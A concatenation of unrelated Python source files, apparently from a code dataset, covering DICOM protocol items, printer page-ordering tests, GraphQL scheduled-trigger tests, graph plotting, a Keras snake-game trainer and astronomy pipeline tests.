class N_EVENT_REPORT_ServiceParamters:
def __init__(self):
self.MessageID = None
self.MessageIDBeingRespondedTo = None
self.AffectedSOPClassUID = None
self.AffectedSOPInstanceUID = None
self.EventTypeID = None
self.EventInformation = None
self.EventReply = None
self.Status = None
class N_GET_ServiceParamters:
def __init__(self):
self.MessageID = None
self.MessageIDBeingRespondedTo = None
self.RequestedSOPClassUID = None
self.RequestedSOPInstanceUID = None
self.AttributeIdentifierList = None
self.AffectedSOPClassUID = None
self.AffectedSOPInstanceUID = None
self.AttributeList = None
self.Status = None
class N_SET_ServiceParamters:
def __init__(self):
self.MessageID = None
self.MessageIDBeingRespondedTo = None
self.RequestedSOPClassUID = None
self.RequestedSOPInstanceUID = None
self.ModificationList = None
self.AttributeList = None
self.AffectedSOPClassUID = None
self.AffectedSOPInstanceUID = None
self.Status = None
class N_ACTION_ServiceParamters:
def __init__(self):
self.MessageID = None
self.MessageIDBeingRespondedTo = None
self.RequestedSOPClassUID = None
self.RequestedSOPInstanceUID = None
self.ActionTypeID = None
self.ActionInformation = None
self.AffectedSOPClassUID = None
self.AffectedSOPInstanceUID = None
self.ActionReply = None
self.Status = None
class N_CREATE_ServiceParamters:
def __init__(self):
self.MessageID = None
self.MessageIDBeingRespondedTo = None
self.AffectedSOPClassUID = None
self.AffectedSOPInstanceUID = None
self.AttributeList = None
self.Status = None
class N_DELETE_ServiceParamters:
def __init__(self):
self.MessageID = None
self.MessageIDBeingRespondedTo = None
self.RequestedSOPClassUID = None
self.RequestedSOPInstanceUID = None
self.AffectedSOPClassUID = None
self.AffectedSOPInstanceUID = None
self.Status = None
class C_STORE_RQ_Message:
def __init__(self):
pass
class C_STORE_Service:
def __init__(self):
self.Parameters = C_STORE_ServiceParameters()
#
#
# Extented association stuff: Defined in part 3.7
#
#
#
#
#
class ImplementationClassUIDParameters:
def __init__(self):
self.ImplementationClassUID = None
def ToParams(self):
tmp = ImplementationClassUIDSubItem()
tmp.FromParams(self)
return tmp
class ImplementationClassUIDSubItem:
def __init__(self):
self.ItemType = 0x52 # Unsigned byte
# Unsigned byte 0x00
self.Reserved = 0x00
self.ItemLength = None # Unsigned short
self.ImplementationClassUID = None # String
def FromParams(self, Params):
self.ImplementationClassUID = Params.ImplementationClassUID
self.ItemLength = len(self.ImplementationClassUID)
def ToParams(self):
tmp = ImplementationClassUIDParameters()
tmp.ImplementationClassUID = self.ImplementationClassUID
return tmp
def Encode(self):
tmp = ''
tmp = tmp + struct.pack('B', self.ItemType)
tmp = tmp + struct.pack('B', self.Reserved)
tmp = tmp + struct.pack('>H', self.ItemLength)
tmp = tmp + self.ImplementationClassUID
return tmp
def Decode(self, Stream):
(self.ItemType, self.Reserved,
self.ItemLength) = struct.unpack('> B B H', Stream.read(4))
self.ImplementationClassUID = Stream.read(self.ItemLength)
def TotalLength(self):
return 4 + self.ItemLength
def __repr__(self):
tmp = " Implementation class IUD sub item\n"
tmp = tmp + " Item type: 0x%02x\n" % self.ItemType
tmp = tmp + " Item length: %d\n" % self.ItemLength
tmp = tmp + \
" SOP class UID length: %s\n" % self.ImplementationClassUID
return tmp
#
#
#
class ImplementationVersionNameParameters:
def __init__(self):
self.ImplementationVersionName = None
def ToParams(self):
tmp = ImplementationVersionNameSubItem()
tmp.FromParams(self)
return tmp
class ImplementationVersionNameSubItem:
def __init__(self):
self.ItemType = 0x55 # Unsigned byte
# Unsigned byte 0x00
self.Reserved = 0x00
self.ItemLength = None # Unsigned short
self.ImplementationVersionName = None # String
def FromParams(self, Params):
self.ImplementationVersionName = Params.ImplementationVersionName
self.ItemLength = len(self.ImplementationVersionName)
def ToParams(self):
tmp = ImplementationVersionNameParameters()
tmp.ImplementationVersionName = self.ImplementationVersionName
return tmp
def Encode(self):
tmp = ''
tmp = tmp + struct.pack('B', self.ItemType)
tmp = tmp + struct.pack('B', self.Reserved)
tmp = tmp + struct.pack('>H', self.ItemLength)
tmp = tmp + self.ImplementationVersionName
return tmp
def Decode(self, Stream):
(self.ItemType, self.Reserved,
self.ItemLength) = struct.unpack('> B B H', Stream.read(4))
self.ImplementationVersionName = Stream.read(self.ItemLength)
def TotalLength(self):
return 4 + self.ItemLength
def __repr__(self):
tmp = " Implementation version name sub item\n"
tmp = tmp + " Item type: 0x%02x\n" % self.ItemType
tmp = tmp + " Item length: %d\n" % self.ItemLength
tmp = tmp + \
" SOP class UID length: %s\n" % self.ImplementationVersionName
return tmp
class AsynchronousOperationsWindowSubItem:
def __init__(self):
# Unsigned byte
self.ItemType = 0x53
# Unsigned byte
self.Reserved = 0x00
# Unsigned short
self.ItemLength = 0x0004
self.MaximumNumberOperationsInvoked = None # Unsigned short
# Unsigned short
self.MaximumNumberOperationsPerformed = None
def FromParams(self, Params):
self.MaximumNumberOperationsInvoked = \
Params.MaximumNumberOperationsInvoked
self.MaximumNumberOperationsPerformed = \
Params.MaximumNumberOperationsPerformed
def ToParams(self):
tmp = AsynchronousOperationsWindowSubItem()
tmp.MaximumNumberOperationsInvoked = \
self.MaximumNumberOperationsInvoked
tmp.MaximumNumberOperationsPerformed = \
self.MaximumNumberOperationsPerformed
return tmp
def Encode(self):
tmp = ''
tmp = tmp + struct.pack('B', self.ItemType)
tmp = tmp + struct.pack('B', self.Reserved)
tmp = tmp + struct.pack('>H', self.ItemLength)
tmp = tmp + struct.pack('>H', self.MaximumNumberOperationsInvoked)
tmp = tmp + struct.pack('>H', self.MaximumNumberOperationsPerformed)
return tmp
def Decode(self, Stream):
(self.ItemType, self.Reserved, self.ItemLength,
self.MaximumNumberOperationsInvoked,
self.MaximumNumberOperationsPerformed) = struct.unpack('> B B H H H',
Stream.read(8))
def TotalLength(self):
return 4 + self.ItemLength
def __repr__(self):
tmp = " Asynchoneous operation window sub item\n"
tmp = tmp + " Item type: 0x%02x\n" % self.ItemType
tmp = tmp + " Item length: %d\n" % self.ItemLength
tmp = tmp + \
" Maximum number of operations invoked: %d\n" % \
self.MaximumNumberOperationsInvoked
tmp = tmp + \
" Maximum number of operations performed: %d\n" % \
self.MaximumNumberOperationsPerformed
return tmp
import struct
class SCP_SCU_RoleSelectionParameters:
def __init__(self):
self.SOPClassUID = None
self.SCURole = None
self.SCPRole = None
def ToParams(self):
tmp = SCP_SCU_RoleSelectionSubItem()
tmp.FromParams(self)
return tmp
class SCP_SCU_RoleSelectionSubItem:
def __init__(self):
self.ItemType = 0x54 # Unsigned byte
self.Reserved = 0x00 # Unsigned byte 0x00
self.ItemLength = None # Unsigned short
self.UIDLength = None # Unsigned short
self.SOPClassUID = None # String
self.SCURole = None # Unsigned byte
self.SCPRole = None # Unsigned byte
def FromParams(self, Params):
self.SOPClassUID = Params.SOPClassUID
self.SCURole = Params.SCURole
self.SCPRole = Params.SCPRole
self.ItemLength = 4 + len(self.SOPClassUID)
self.UIDLength = len(self.SOPClassUID)
def ToParams(self):
tmp = SCP_SCU_RoleSelectionParameters()
tmp.SOPClassUID = self.SOPClassUID
tmp.SCURole = self.SCURole
tmp.SCPRole = self.SCPRole
return tmp
def Encode(self):
tmp = ''
tmp += struct.pack('B', self.ItemType)
tmp += struct.pack('B', self.Reserved)
tmp += struct.pack('>H', self.ItemLength)
tmp += struct.pack('>H', self.UIDLength)
tmp += self.SOPClassUID
tmp += struct.pack('B B', self.SCURole, self.SCPRole)
return tmp
def Decode(self, Stream):
(self.ItemType, self.Reserved,
self.ItemLength, self.UIDLength) = struct.unpack('> B B H H',
Stream.read(6))
self.SOPClassUID = Stream.read(self.UIDLength)
(self.SCURole, self.SCPRole) = struct.unpack('B B', Stream.read(2))
def TotalLength(self):
return 4 + self.ItemLength
def __repr__(self):
tmp = " SCU/SCP role selection sub item\n"
tmp = tmp + " Item type: 0x%02x\n" % self.ItemType
tmp = tmp + " Item length: %d\n" % self.ItemLength
tmp = tmp + " SOP class UID length: %d\n" % self.UIDLength
tmp = tmp + " SOP class UID: %s\n" % self.SOPClassUID
tmp = tmp + " SCU Role: %d\n" % self.SCURole
tmp = tmp + " SCP Role: %d" % self.SCPRole
return tmp
# needs to be re-worked
# class SOPClassExtentedNegociationSubItem:
# def __init__(self):
# self.ItemType = 0x56 # Unsigned byte
# self.Reserved = 0x00 # Unsigned byte - 0x00
# self.ItemLength = None # Unsigned short
# self.SOPClassUIDLength = None # Unsigned short
# self.SOPClassUID = None # String
# self.ServiceClassApplicationInformation = None # Class
#
# def FromParams(self, Params):
# self.SOPClassUID = Params.SOPClassUID
# self.ServiceClassApplicationInformation = \
# Params.ServiceClassApplicationInformation()
# self.SOPClassUIDLength = len(self.SOPClassUID)
# self.ItemLength = 2 + self.SOPClassUIDLength + \
# self.ServiceClassApplicationInformation.TotalLength()
#
# def ToParams(self):
# tmp = SOPClassExtentedNegociationSubItem()
# tmp.SOPClassUID = self.SOPClassUID
# tmp.ServiceClassApplicationInformation = \
# self.ServiceClassApplicationInformation
# return (self.SOPClassUID, \
# self.ServiceClassApplicationInformation.Decompose())
#
# def Encode(self):
# tmp = ''
# tmp = tmp + struct.pack('B', self.ItemType)
# tmp = tmp + struct.pack('B', self.Reserved)
# tmp = tmp + struct.pack('>H', self.ItemLength)
# tmp = tmp + struct.pack('>H', self.SOPClassUIDLength)
# tmp = tmp + self.SOPClassUID
# tmp = tmp + self.ServiceClassApplicationInformation.Encode()
# return tmp
#
# def Decode(self,Stream):
# (self.ItemType, self.Reserved,
# self.ItemLength, self.SOPClassUIDLength) = \
# struct.unpack('> B B H H', Stream.read(6))
# self.SOPClassUID = Stream.read(self.UIDLength)
# self.ServiceClassApplicationInformation.Decode(Stream)
#
# def TotalLength(self):
# return 4 + self.ItemLength
#
#
#
# def __repr__(self):
# tmp = " SOP class extended negociation sub item\n"
# tmp = tmp + " Item type: 0x%02x\n" % self.ItemType
# tmp = tmp + " Item length: %d\n" % self.ItemLength
# tmp = tmp + " SOP class UID length: %d\n" % self.SOPClassUIDLength
# tmp = tmp + " SOP class UID: %s" % self.SOPClassUID
# return tmp
#
| 30.965863 | 79 | 0.620582 |
f644cfa7f50d8618319452d097808d17fc6e0707 | 1,864 | py | Python | tools/dahyeprinter/test_printer.py | JiniousChoi/encyclopedia-in-code | 77bc551a03a2a3e3808e50016ece14adb5cfbd96 | [
"MIT"
] | 2 | 2018-07-20T10:15:49.000Z | 2018-07-20T10:16:54.000Z | tools/dahyeprinter/test_printer.py | JiniousChoi/encyclopedia-in-code | 77bc551a03a2a3e3808e50016ece14adb5cfbd96 | [
"MIT"
] | 2 | 2018-06-26T09:12:44.000Z | 2019-12-18T00:09:14.000Z | tools/dahyeprinter/test_printer.py | JiniousChoi/encyclopedia-in-code | 77bc551a03a2a3e3808e50016ece14adb5cfbd96 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import unittest
from printer import pages_in_order, _pairing, _taking_odd, _taking_even, _flattening
class PrinterTest(unittest.TestCase):
def test_even_pages(self):
tot_pages, per_each_page = 4, 1
fp, sp = pages_in_order(tot_pages, per_each_page)
self.assertEqual(fp, [1,3])
self.assertEqual(sp, [4,2])
def test_odd_pages(self):
tot_pages, per_each_page = 5, 1
fp, sp = pages_in_order(tot_pages, per_each_page)
self.assertEqual(fp, [1,3,5])
self.assertEqual(sp, [4,2])
def test_pairing_1(self):
tot_pages, per_each_page = 5, 1
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1], [2], [3], [4], [5]])
def test_pairing_2(self):
tot_pages, per_each_page = 5, 2
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2], [3,4], [5]])
tot_pages, per_each_page = 6, 2
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2], [3,4], [5,6]])
def test_pairing_3(self):
tot_pages, per_each_page = 5, 4
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2,3,4], [5]])
tot_pages, per_each_page = 8, 4
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2,3,4], [5,6,7,8]])
def test_taking_odd(self):
l = [[1],[2],[3],[4],[5]]
o = _taking_odd(l)
self.assertEqual(o, [[1],[3],[5]])
def test_taking_even(self):
l = [[1],[2],[3],[4],[5]]
o = _taking_even(l)
self.assertEqual(o, [[2],[4]])
def test_flattening(self):
l = [[1],[2],[3],[4],[5]]
o = _flattening(l)
self.assertEqual(o, [1,2,3,4,5])
if __name__=="__main__":
unittest.main()
| 31.066667 | 84 | 0.584764 |
2b1396873312c652fd10e8faa741fa1877361a08 | 17,060 | py | Python | server/tests-py/test_scheduled_triggers.py | eazyfin/graphql-engine | 72cc73826b37bfb05bde505fe21f8a60201855cb | [
"Apache-2.0",
"MIT"
] | 1 | 2019-10-31T19:50:02.000Z | 2019-10-31T19:50:02.000Z | server/tests-py/test_scheduled_triggers.py | eazyfin/graphql-engine | 72cc73826b37bfb05bde505fe21f8a60201855cb | [
"Apache-2.0",
"MIT"
] | null | null | null | server/tests-py/test_scheduled_triggers.py | eazyfin/graphql-engine | 72cc73826b37bfb05bde505fe21f8a60201855cb | [
"Apache-2.0",
"MIT"
] | null | null | null | #!/usr/bin/env python3
import pytest
from datetime import datetime,timedelta
from croniter import croniter
from validate import validate_event_webhook,validate_event_headers
from queue import Empty
import json
import time
from utils import until_asserts_pass
# The create and delete tests should ideally go in setup and teardown YAML files,
# We can't use that here because, the payload is dynamic i.e. in case of one-off scheduled events
# the value is the current timestamp and in case of cron Triggers, the cron schedule is
# derived based on the current timestamp
def stringify_datetime(dt):
return dt.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
@pytest.mark.usefixtures('per_method_tests_db_state')
class TestScheduledEvent(object):
@classmethod
def dir(cls):
return 'queries/scheduled_triggers'
webhook_payload = {"foo":"baz"}
header_conf = [
{
"name":"header-key",
"value":"header-value"
}
]
webhook_domain = "http://127.0.0.1:5594"
def test_scheduled_events(self,hge_ctx,scheduled_triggers_evts_webhook):
query = {
"type": "bulk",
"args": [
# Succeeds
{
"type":"create_scheduled_event",
"args":{
"webhook":'{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}/test',
"schedule_at":stringify_datetime(datetime.utcnow()),
"payload":self.webhook_payload,
"headers":self.header_conf,
"comment":"test scheduled event"
}
},
# Fails immediately, with 'dead'
{
"type":"create_scheduled_event",
"args":{
"webhook":"{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}/",
"schedule_at": "2020-01-01T00:00:00Z",
"payload":self.webhook_payload,
"headers":self.header_conf
}
},
# Fails on request, trying twice:
{
"type":"create_scheduled_event",
"args":{
"webhook":self.webhook_domain + '/fail',
"schedule_at": stringify_datetime(datetime.utcnow()),
"payload":self.webhook_payload,
"headers":self.header_conf,
"retry_conf":{
"num_retries":1,
"retry_interval_seconds":1,
"timeout_seconds":1,
"tolerance_seconds": 21600
}
}
}
]
}
st, resp = hge_ctx.v1q(query)
assert st == 200,resp
assert len(resp) == 3, resp
# ensuring that valid event_id is returned for all requests
assert all(['event_id' in r for r in resp]), resp
# Here we check the three requests received by the webhook.
# Collect the three generated events (they may arrive out of order):
e1 = scheduled_triggers_evts_webhook.get_event(12) # at least 10 sec, see processScheduledTriggers.sleep
e2 = scheduled_triggers_evts_webhook.get_event(12)
e3 = scheduled_triggers_evts_webhook.get_event(12)
[event_fail1, event_fail2, event_success] = sorted([e1,e2,e3], key=lambda e: e['path'])
# Check the two failures:
validate_event_webhook(event_fail1['path'],'/fail')
validate_event_webhook(event_fail2['path'],'/fail')
# Check the one successful webhook call:
query = {
"type":"run_sql",
"args":{
"sql":'''
select timezone('utc',created_at) as created_at
from hdb_catalog.hdb_scheduled_events
where comment = 'test scheduled event';
'''
}
}
st, resp = hge_ctx.v1q(query)
assert st == 200, resp
db_created_at = resp['result'][1][0]
validate_event_webhook(event_success['path'],'/test')
validate_event_headers(event_success['headers'],{"header-key":"header-value"})
assert event_success['body']['payload'] == self.webhook_payload
assert event_success['body']['created_at'] == db_created_at.replace(" ","T") + "Z"
payload_keys = dict.keys(event_success['body'])
for k in ["scheduled_time","created_at","id"]: # additional keys
assert k in payload_keys
assert scheduled_triggers_evts_webhook.is_queue_empty()
def try_check_events_statuses():
query = {
"type":"run_sql",
"args":{
"sql":"select status,tries from hdb_catalog.hdb_scheduled_events order by status desc"
}
}
st, resp = hge_ctx.v1q(query)
assert st == 200, resp
scheduled_event_statuses = resp['result']
# 3 scheduled events have been created
# one should be dead because the timestamp was past the tolerance limit
# one should be delivered because all the parameters were reasonable
# one should be error because the webhook returns an error state
assert scheduled_event_statuses == [
['status', 'tries'],
['error', '2'], # num_retries + 1
['delivered', '1'],
['dead', '0']
], resp
until_asserts_pass(100,try_check_events_statuses)
class TestCronTrigger(object):
cron_trigger_name = "cron_trigger"
def test_create_cron_schedule_triggers(self,hge_ctx):
# setting the test to be after 30 mins, to make sure that
# any of the events are not delivered.
min_after_30_mins = (datetime.utcnow() + timedelta(minutes=30)).minute
TestCronTrigger.cron_schedule = "{} * * * *".format(min_after_30_mins)
cron_st_api_query = {
"type":"create_cron_trigger",
"args":{
"name":self.cron_trigger_name,
"webhook":"{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}" + "/foo",
"schedule":self.cron_schedule,
"headers":[
{
"name":"foo",
"value":"baz"
}
],
"payload":{"foo":"baz"},
"include_in_metadata":True
}
}
cron_st_code,cron_st_resp = hge_ctx.v1q(cron_st_api_query)
TestCronTrigger.init_time = datetime.utcnow()
# the cron events will be generated based on the current time, they
# will not be exactly the same though(the server now and now here)
assert cron_st_code == 200,cron_st_resp
assert cron_st_resp['message'] == 'success'
def test_check_generated_cron_scheduled_events(self,hge_ctx):
expected_schedule_timestamps = []
iter = croniter(self.cron_schedule,self.init_time)
for i in range(100):
expected_schedule_timestamps.append(iter.next(datetime))
# Get timestamps in UTC from the db to compare it with
# the croniter generated timestamps
sql = '''
select timezone('utc',scheduled_time) as scheduled_time
from hdb_catalog.hdb_cron_events where
trigger_name = '{}' order by scheduled_time asc;'''
q = {
"type":"run_sql",
"args":{
"sql":sql.format(self.cron_trigger_name)
}
}
st,resp = hge_ctx.v1q(q)
assert st == 200,resp
ts_resp = resp['result'][1:]
assert len(ts_resp) == 100
# 100 scheduled events are generated in a single batch when the
# scheduled events need hydration
actual_schedule_timestamps = []
for ts in ts_resp:
datetime_ts = datetime.strptime(ts[0],"%Y-%m-%d %H:%M:%S")
actual_schedule_timestamps.append(datetime_ts)
assert actual_schedule_timestamps == expected_schedule_timestamps
def test_update_existing_cron_trigger(self,hge_ctx):
expected_schedule_timestamps = []
iter = croniter(self.cron_schedule,datetime.utcnow())
for i in range(100):
expected_schedule_timestamps.append(iter.next(datetime))
q = {
"type":"create_cron_trigger",
"args":{
"name":self.cron_trigger_name,
"webhook":"{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}" + "/foo",
"schedule":self.cron_schedule,
"headers":[
{
"name":"header-name",
"value":"header-value"
}
],
"payload":{"foo":"baz"},
"include_in_metadata":True,
"replace":True
}
}
st,resp = hge_ctx.v1q(q)
assert st == 200, resp
st, resp = hge_ctx.v1q({'type': 'export_metadata', 'args': {}})
assert st == 200,resp
all_cron_triggers = resp['cron_triggers']
for cron_trigger in all_cron_triggers:
if cron_trigger['name'] == self.cron_trigger_name:
assert cron_trigger['headers'] == [{
"name":"header-name",
"value":"header-value"
}]
# Get timestamps in UTC from the db to compare it with
# the croniter generated timestamps
# After updating the cron trigger, the future events should
# have been created
sql = '''
select timezone('utc',scheduled_time) as scheduled_time
from hdb_catalog.hdb_cron_events where
trigger_name = '{}' order by scheduled_time asc;'''
q = {
"type":"run_sql",
"args":{
"sql":sql.format(self.cron_trigger_name)
}
}
st,resp = hge_ctx.v1q(q)
assert st == 200,resp
ts_resp = resp['result'][1:]
assert len(ts_resp) == 100
actual_schedule_timestamps = []
for ts in ts_resp:
datetime_ts = datetime.strptime(ts[0],"%Y-%m-%d %H:%M:%S")
actual_schedule_timestamps.append(datetime_ts)
assert actual_schedule_timestamps == expected_schedule_timestamps
def test_check_fired_webhook_event(self, hge_ctx, scheduled_triggers_evts_webhook):
q = {
"type":"create_cron_trigger",
"args":{
"name":"test_cron_trigger",
"webhook":"{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}" + "/test",
"schedule":"* * * * *",
"headers":[
{
"name":"header-key",
"value":"header-value"
}
],
"payload":{"foo":"baz"},
"include_in_metadata":False
}
}
st,resp = hge_ctx.v1q(q)
assert st == 200, resp
# The maximum timeout is set to 75s because, the cron timestamps
# that are generated will start from the next minute, suppose
# the cron schedule is "* * * * *" and the time the cron trigger
# is created is 10:00:00, then the next event will be scheduled
# at 10:01:00, but the events processor will not process it
# exactly at the zeroeth second of 10:01. The only guarantee
# is that, the event processor will start to process the event before
# 10:01:10 (seel sleep in processScheduledTriggers). So, in the worst
# case, it will take 70 seconds to process the first scheduled event.
event = scheduled_triggers_evts_webhook.get_event(75)
validate_event_webhook(event['path'],'/test')
validate_event_headers(event['headers'],{"header-key":"header-value"})
assert event['body']['payload'] == {"foo":"baz"}
assert event['body']['name'] == 'test_cron_trigger'
def test_get_cron_triggers(self, hge_ctx):
q = {
"type": "get_cron_triggers",
"args": {}
}
st, resp = hge_ctx.v1metadataq(q)
assert st == 200, resp
respDict = json.loads(json.dumps(resp))
assert respDict['cron_triggers'] == [
{
"headers": [
{
"name": "header-name",
"value": "header-value"
}
],
"include_in_metadata": True,
"name": self.cron_trigger_name,
"payload": {
"foo": "baz"
},
"retry_conf": {
"num_retries": 0,
"retry_interval_seconds": 10,
"timeout_seconds": 60,
"tolerance_seconds": 21600
},
"schedule": self.cron_schedule,
"webhook": "{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}/foo"
},
{
"headers": [
{
"name": "header-key",
"value": "header-value"
}
],
"include_in_metadata": False,
"name": "test_cron_trigger",
"payload": {
"foo": "baz"
},
"retry_conf": {
"num_retries": 0,
"retry_interval_seconds": 10,
"timeout_seconds": 60,
"tolerance_seconds": 21600
},
"schedule": "* * * * *",
"webhook": "{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}/test"
},
]
def test_export_and_import_cron_triggers(self, hge_ctx):
q = {
"type": "export_metadata",
"args": {}
}
st, resp = hge_ctx.v1q(q)
assert st == 200, resp
respDict = json.loads(json.dumps(resp))
# Only the cron triggers with `include_in_metadata` set to `True`
# should be exported
assert respDict['cron_triggers'] == [
{
"headers": [
{
"name": "header-name",
"value": "header-value"
}
],
"include_in_metadata": True,
"name": self.cron_trigger_name,
"payload": {
"foo": "baz"
},
"schedule": self.cron_schedule,
"webhook": "{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}/foo"
}
]
q = {
"type": "replace_metadata",
"args": {
"metadata": resp
}
}
st, resp = hge_ctx.v1q(q)
sql = '''
select count(1) as count
from hdb_catalog.hdb_cron_events
where trigger_name = '{}'
'''
run_sql_query = {
"type": "run_sql",
"args": {
"sql": sql.format(self.cron_trigger_name)
}
}
st, resp = hge_ctx.v1q(run_sql_query)
assert st == 200, resp
count_resp = resp['result'][1][0]
# Check if the future cron events are created for
# for a cron trigger while imported from the metadata
assert int(count_resp) == 100
def test_attempt_to_create_duplicate_cron_trigger_fail(self, hge_ctx):
q = {
"type":"create_cron_trigger",
"args":{
"name":"test_cron_trigger",
"webhook":"{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}" + "/test",
"schedule":"* * * * *",
"headers":[
{
"name":"header-key",
"value":"header-value"
}
],
"payload":{"foo":"baz"},
"include_in_metadata":False
}
}
st, resp = hge_ctx.v1q(q)
assert st == 400, dict(resp)
assert dict(resp) == {
"code": "already-exists",
"error": 'cron trigger with name: test_cron_trigger already exists',
"path": "$.args"
}
def test_delete_cron_scheduled_trigger(self,hge_ctx):
q = {
"type": "bulk",
"args": [
{
"type":"delete_cron_trigger",
"args":{
"name":self.cron_trigger_name
}
},
{
"type":"delete_cron_trigger",
"args":{
"name":"test_cron_trigger"
}
}
]
}
st,resp = hge_ctx.v1q(q)
assert st == 200,resp
| 37.995546 | 112 | 0.507855 |
7ffa2ae0239dcb4830bbe9bedafa299d3490a5f2 | 2,524 | py | Python | TextGraphics/Analysis/plotting.py | Jverma/TextGraphics | 6659c884c7814ec6a258941299fcfd400d7059cc | [
"MIT"
] | 15 | 2015-03-28T09:17:09.000Z | 2021-09-07T17:32:51.000Z | TextGraphics/Analysis/plotting.py | Jverma/TextGraphics | 6659c884c7814ec6a258941299fcfd400d7059cc | [
"MIT"
] | null | null | null | TextGraphics/Analysis/plotting.py | Jverma/TextGraphics | 6659c884c7814ec6a258941299fcfd400d7059cc | [
"MIT"
] | 8 | 2016-03-08T05:42:22.000Z | 2021-03-20T13:23:33.000Z | # -*- coding: utf-8 -*-
# Plots of the graph and its properties.
# This will be deprecated and replaced by better viusals
# based on R package ggplot2 or d3.js
from __future__ import division
import numpy as np
import networkx as nx
from matplotlib import pyplot as plt
#from TextGraphics.src.graph import TextGraph
class Pictures:
"""
Analyzing the graph by using drawings.
Arguments:
graph - a networkx graph or digraph.
"""
def __init__(self, graph):
self.g = graph
def graphPlot(self, threshold, labelingByNumbers=False):
"""
Plot of the (weighted) graph.
Arguments:
threshold - a value of the weight threshold to separate
strong edges from weak ones.
Returns:
a matplotlib plot of the graph.
"""
nodes = self.g.nodes()
labels = {}
for i,s in enumerate(nodes):
labels[s] = i
elarge = [(u,v) for (u,v,d) in self.g.edges(data=True) if d['weight'] > threshold]
esmall = [(u,v) for (u,v,d) in self.g.edges(data=True) if d['weight'] <= threshold]
pos = nx.spring_layout(self.g)
nx.draw_networkx_nodes(self.g, pos, node_size=500)
nx.draw_networkx_edges(self.g, pos, edgelist=elarge, width=3)
nx.draw_networkx_edges(self.g, pos, edgelist=esmall, width=3, alpha=0.5, edge_color='b', style='dashed')
if (labelingByNumbers == True):
nx.draw_networkx_labels(self.g, pos, font_size=20, font_family='sans_serif', labels=labels)
else:
nx.draw_networkx_labels(self.g, pos, font_size=20, font_family='sans_serif')
plt.axis('off')
plt.show()
def degreePlot(self):
"""
Plot the degrees of the nodes.
"""
gr = self.g
degreeDict = nx.degree_centrality(gr)
n = len(degreeDict)
x = range[n]
y = []
for sen in degreeDict.keys():
degree = degreeDict[sen]
y.append(degree)
plt.plot(x,y,'ro')
plt.show()
def betweennessPlot(self):
"""
Plot the betweenness centrality of the nodes.
"""
gr = self.g
betweennessDict = nx.betweenness_centrality(gr)
n = len(betweennessDict)
x = range[n]
y = []
for sen in betweennessDict.keys():
betweenness = betweennessDict[sen]
y.append(betweenness)
plt.plot(x,y,'ro')
plt.show()
def closenessPlot(self):
"""
Plot the closeness centrality of the nodes.
"""
gr = self.g
closenessDict = nx.closeness_centrality(gr)
n = len(closenessDict)
x = range[n]
y = []
for sen in closenessDict.keys():
closeness = closenessDict[sen]
y.append(closeness)
plt.plot(x,y,'ro')
plt.show()
| 17.054054 | 106 | 0.661648 |
d57ede0b7dc49108b75a6b1b7598750034c2f823 | 1,056 | py | Python | main.py | MarshallBriggs/NeuralNetworkSnake-Python- | 120eb87c9955c842caebd91bc48f521ce70fb025 | [
"MIT"
] | null | null | null | main.py | MarshallBriggs/NeuralNetworkSnake-Python- | 120eb87c9955c842caebd91bc48f521ce70fb025 | [
"MIT"
] | null | null | null | main.py | MarshallBriggs/NeuralNetworkSnake-Python- | 120eb87c9955c842caebd91bc48f521ce70fb025 | [
"MIT"
] | null | null | null | from game import *
from training_data import generate_training_data
from keras.models import Sequential
from keras.layers import Dense
display_width = 500
display_height = 500
green = (0,255,0)
red = (255,0,0)
black = (0,0,0)
white = (255,255,255)
pygame.init()
display=pygame.display.set_mode((display_width,display_height))
clock=pygame.time.Clock()
'''
LEFT -> button_direction = 0
RIGHT -> button_direction = 1
DOWN ->button_direction = 2
UP -> button_direction = 3
'''
training_data_x, training_data_y = generate_training_data(display,clock)
model = Sequential()
model.add(Dense(units=9,input_dim=7))
model.add(Dense(units=15, activation='relu'))
model.add(Dense(output_dim=3, activation = 'softmax'))
model.compile(loss='mean_squared_error', optimizer='adam', metrics=['accuracy'])
model.fit((np.array(training_data_x).reshape(-1,7)),( np.array(training_data_y).reshape(-1,3)), batch_size = 256,epochs= 3)
model.save_weights('model.h5')
model_json = model.to_json()
with open('model.json', 'w') as json_file:
json_file.write(model_json) | 27.076923 | 123 | 0.749053 |
079b1328608faad44c0e1e0cabc215207362628f | 1,503 | py | Python | src/huntsman/drp/tests/test_reduction.py | AstroHuntsman/huntsman-drp | 00f045ccccc1f7545da491457a2b17b9aabea89a | [
"MIT"
] | 1 | 2022-01-03T05:24:33.000Z | 2022-01-03T05:24:33.000Z | src/huntsman/drp/tests/test_reduction.py | fergusL/huntsman-drp | 7f370079e347e4ef5500678808ea9a7952c04e7e | [
"MIT"
] | 139 | 2020-10-02T01:49:29.000Z | 2021-09-07T04:58:51.000Z | src/huntsman/drp/tests/test_reduction.py | fergusL/huntsman-drp | 7f370079e347e4ef5500678808ea9a7952c04e7e | [
"MIT"
] | 3 | 2020-09-03T03:31:30.000Z | 2020-09-07T05:22:23.000Z | import os
import pytest
from huntsman.drp.reduction import create_from_file
@pytest.fixture()
def config_file_lsst(config):
rootdir = config["directories"]["root"]
return os.path.join(rootdir, "config", "reductions", "test-lsst.yaml")
@pytest.fixture()
def config_file_offsetsky(config):
rootdir = config["directories"]["root"]
return os.path.join(rootdir, "config", "reductions", "test-offset-sky.yaml")
@pytest.mark.skip()
def test_lsst_reduction(exposure_collection_real_data, calib_collection_real_data, config,
config_file_lsst, testing_refcat_server):
# TODO: Implement more rigorous test in future
reduction = create_from_file(config_file_lsst,
exposure_collection=exposure_collection_real_data,
calib_collection=calib_collection_real_data,
config=config)
reduction.run(makeplots=True)
# @pytest.mark.skip()
